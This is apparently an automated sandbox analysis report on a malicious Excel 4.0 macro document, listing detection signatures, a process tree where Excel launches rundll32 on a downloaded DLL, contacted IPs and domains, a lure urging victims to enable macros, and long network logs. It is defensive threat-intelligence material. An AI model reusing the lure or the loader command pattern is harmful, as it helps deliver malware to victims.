Loading ...

Play interactive tourEdit tour

Windows Analysis Report statistic-1496367785.xls

Overview

General Information

Sample Name:statistic-1496367785.xls
Analysis ID:441923
MD5:7fb48e03b899f792be6c3118a46c5c8f
SHA1:55445d13cd433121c6c2bfb31414b08e31e28a65
SHA256:1c818433e1ca49729f987b3f060b2133c8375f8164181c4684600a278ee6033f
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Yara detected Xls With Macro 4.0

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2116 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2100 cmdline: rundll32 ..\flamo.vir,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2224 cmdline: rundll32 ..\flamo.vir1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
statistic-1496367785.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security
    statistic-1496367785.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\flamo.vir,DllRegisterServer, CommandLine: rundll32 ..\flamo.vir,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2116, ProcessCommandLine: rundll32 ..\flamo.vir,DllRegisterServer, ProcessId: 2100

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: statistic-1496367785.xlsVirustotal: Detection: 37%Perma Link
      Source: statistic-1496367785.xlsReversingLabs: Detection: 34%
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: unknownHTTPS traffic detected: 162.241.2.112:443 -> 192.168.2.22:49165 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.179.232.80:443 -> 192.168.2.22:49168 version: TLS 1.2

      Software Vulnerabilities:

      barindex
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
      Source: global trafficDNS query: name: psq.com.mx
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 162.241.2.112:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 162.241.2.112:443
      Source: Joe Sandbox ViewIP Address: 108.179.232.80 108.179.232.80
      Source: Joe Sandbox ViewIP Address: 162.241.2.112 162.241.2.112
      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: rundll32.exe, 00000003.00000002.2342252530.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337705757.0000000001AC0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: unknownDNS traffic detected: queries for: psq.com.mx
      Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
      Source: E0968A1E3A40D2582E7FD463BAEB59CD0.0.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
      Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: rundll32.exe, 00000003.00000002.2342252530.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337705757.0000000001AC0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
      Source: rundll32.exe, 00000003.00000002.2342252530.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337705757.0000000001AC0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
      Source: rundll32.exe, 00000003.00000002.2342442297.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337877607.0000000001CA7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: rundll32.exe, 00000003.00000002.2342442297.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337877607.0000000001CA7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: E0968A1E3A40D2582E7FD463BAEB59CD0.0.drString found in binary or memory: http://ocsp.comodoca.com0
      Source: rundll32.exe, 00000003.00000002.2342442297.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337877607.0000000001CA7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: rundll32.exe, 00000003.00000002.2342442297.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337877607.0000000001CA7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: rundll32.exe, 00000003.00000002.2342252530.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337705757.0000000001AC0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: rundll32.exe, 00000003.00000002.2342442297.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337877607.0000000001CA7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: rundll32.exe, 00000003.00000002.2342252530.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337705757.0000000001AC0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: rundll32.exe, 00000005.00000002.2337705757.0000000001AC0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49189
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49188
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49187
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49186
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49185
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49184
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49182
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
      Source: unknownNetwork traffic detected: HTTP traffic on port 49204 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49227 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
      Source: unknownNetwork traffic detected: HTTP traffic on port 49279 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49256 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49199 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49210 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49233 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
      Source: unknownNetwork traffic detected: HTTP traffic on port 49262 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
      Source: unknownNetwork traffic detected: HTTP traffic on port 49188 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
      Source: unknownNetwork traffic detected: HTTP traffic on port 49245 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49194 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49238 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49251 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49267 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49244 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49187 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49289
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49288
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49287
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49286
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49285
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49284
      Source: unknownNetwork traffic detected: HTTP traffic on port 49286 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49283
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49282
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49281
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49280
      Source: unknownNetwork traffic detected: HTTP traffic on port 49193 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49239 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49273 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49216 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49250 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49279
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49278
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49277
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49276
      Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49182 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49275
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49274
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49273
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49272
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49271
      Source: unknownNetwork traffic detected: HTTP traffic on port 49222 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49270
      Source: unknownNetwork traffic detected: HTTP traffic on port 49205 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49211 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49269 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49284 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49200 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49246 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49223 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49281 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49275 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49252 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49228 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49241 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49198 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49234 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49217 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49263 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49240 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49206 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49197 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49212 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49235 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49218 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49268 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49186 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49199
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49198
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49197
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49196
      Source: unknownNetwork traffic detected: HTTP traffic on port 49285 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49195
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49194
      Source: unknownNetwork traffic detected: HTTP traffic on port 49201 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49193
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49192
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49191
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49190
      Source: unknownNetwork traffic detected: HTTP traffic on port 49280 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49229 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49257 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49192 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49274 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49227
      Source: unknownNetwork traffic detected: HTTP traffic on port 49185 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49226
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49225
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49224
      Source: unknownNetwork traffic detected: HTTP traffic on port 49265 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49223
      Source: unknownNetwork traffic detected: HTTP traffic on port 49288 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49222
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49221
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49220
      Source: unknownNetwork traffic detected: HTTP traffic on port 49242 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49207 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49191 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49271 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49219
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49218
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49217
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49216
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49215
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49214
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49213
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49212
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49211
      Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49210
      Source: unknownNetwork traffic detected: HTTP traffic on port 49224 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49282 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49276 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49213 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49259 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49209
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49208
      Source: unknownNetwork traffic detected: HTTP traffic on port 49230 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49207
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49206
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49205
      Source: unknownNetwork traffic detected: HTTP traffic on port 49219 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49204
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49203
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49202
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49201
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49200
      Source: unknownNetwork traffic detected: HTTP traffic on port 49202 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49225 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49231 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49258 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49289 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49247 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49264 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49208 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49196 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49236 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49253 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49269
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49268
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49267
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49266
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49265
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49264
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49263
      Source: unknownNetwork traffic detected: HTTP traffic on port 49261 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49262
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49261
      Source: unknownNetwork traffic detected: HTTP traffic on port 49189 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49260
      Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49195 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49237 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49214 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49184 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49220 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49259
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49258
      Source: unknownNetwork traffic detected: HTTP traffic on port 49266 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49257
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49256
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49255
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49254
      Source: unknownNetwork traffic detected: HTTP traffic on port 49287 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49190 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49253
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49252
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49251
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49250
      Source: unknownNetwork traffic detected: HTTP traffic on port 49249 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49203 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49255 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49272 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49249
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49248
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49247
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49246
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49245
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49244
      Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49243
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49242
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49241
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49240
      Source: unknownNetwork traffic detected: HTTP traffic on port 49248 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49209 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49221 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49254 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49283 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49277 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49239
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49238
      Source: unknownNetwork traffic detected: HTTP traffic on port 49243 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49237
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49236
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49235
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49234
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49233
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49232
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49231
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49230
      Source: unknownNetwork traffic detected: HTTP traffic on port 49226 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49260 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49229
      Source: unknownNetwork traffic detected: HTTP traffic on port 49215 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49228
      Source: unknownNetwork traffic detected: HTTP traffic on port 49232 -> 443
      Source: unknownHTTPS traffic detected: 162.241.2.112:443 -> 192.168.2.22:49165 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.179.232.80:443 -> 192.168.2.22:49168 version: TLS 1.2

      System Summary:

      barindex
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Screenshot number: 4Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, please click En
      Source: Screenshot number: 4Screenshot OCR: Enable Content 14 from the yellow bar above 15 16 17 ,, WHY I CANNOT OPEN THIS DOCUMENT? 19 2
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: statistic-1496367785.xlsInitial sample: CALL
      Source: statistic-1496367785.xlsInitial sample: EXEC
      Found abnormal large hidden Excel 4.0 Macro sheetShow sources
      Source: statistic-1496367785.xlsInitial sample: Sheet size: 8121
      Source: rundll32.exe, 00000003.00000002.2342252530.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337705757.0000000001AC0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
      Source: classification engineClassification label: mal80.expl.evad.winXLS@5/13@2/2
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\7BCE0000Jump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC33F.tmpJump to behavior
      Source: statistic-1496367785.xlsOLE indicator, Workbook stream: true
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\flamo.vir,DllRegisterServer
      Source: statistic-1496367785.xlsVirustotal: Detection: 37%
      Source: statistic-1496367785.xlsReversingLabs: Detection: 34%
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\flamo.vir,DllRegisterServer
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\flamo.vir1,DllRegisterServer
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\flamo.vir,DllRegisterServer
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\flamo.vir1,DllRegisterServer
      Source: C:\Windows\System32\rundll32.exeAutomated click: OK
      Source: C:\Windows\System32\rundll32.exeAutomated click: OK
      Source: C:\Windows\System32\rundll32.exeAutomated click: OK
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: statistic-1496367785.xlsInitial sample: OLE indicators vbamacros = False
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
